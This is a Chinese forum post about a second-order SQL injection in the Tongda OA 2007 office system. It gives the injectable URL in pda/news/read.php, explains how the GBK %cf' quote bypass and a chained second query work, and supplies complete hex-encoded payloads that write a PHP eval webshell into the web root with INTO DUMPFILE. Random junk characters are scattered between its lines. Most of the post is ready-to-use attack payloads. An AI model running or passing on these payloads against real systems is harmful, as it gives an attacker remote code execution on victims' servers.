找回密码
 立即注册
查看: 3345|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本) p  T/ F0 I6 f& \. G. J

1 T5 X& k- t. E$ e7 Q
0 J, x8 U9 {5 I  C: @Office Anywhere 2007 网络智能办公系统
$ b- R0 l& D) w0 x, j8 w 4 t$ Y& n. P) A% Q& f
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
1 Y: l) ^9 ?7 D0 h! A $ w5 Q5 ?0 I# V* h6 }

3 J5 E7 R  J! [这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
. N# p% e6 P! r* s) m4 f
6 ?1 ~7 d7 u, i% K( U0 R5 P例如:SELECT * from USER where USER_ID='{$USERNAME}'  
/ ^* n8 s* x; P0 Y. P9 S: K* l( L) Z其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
- F7 ?! _* t2 u+ e* R( J ! ?2 l* ^  s# I; X( v
这个时候我们是不是可以组合起来使用哪?8 F& H$ o0 \" J2 [: x' @$ V

/ U, q. @/ o& p8 i# J第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
; o. z0 l. Q# ]/ _# _, uunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
- u1 w' `9 x4 s, w1 a1 }( D# I/ j 1 T* x1 ~, ]7 e/ E& z3 d+ W' X
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
; v& W( i7 h$ @
  T8 c/ H$ D1 N+ M' P( W那么问题来了,单引号可以吗?当然是不可以的,^_^。。。( ?$ j0 ]9 O' J4 \

: r8 O* v2 p: H( A那么我们用字符串格式带入进行hex编码
0 E8 z' Y1 S( l 0 \5 p+ x4 p3 ]( ]+ R; F
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%232 o# |% X$ u) B+ u4 \
3 h) a% b& @, d% J8 k
测试ok,获取oa的webshell
% M9 J$ x. g3 p+ V5 Q( ?5 a
" [1 m3 k2 U' W9 a $ Q0 v' ^% K" V6 d3 ~2 ]2 `
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
& j8 s+ A4 t0 O! k直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表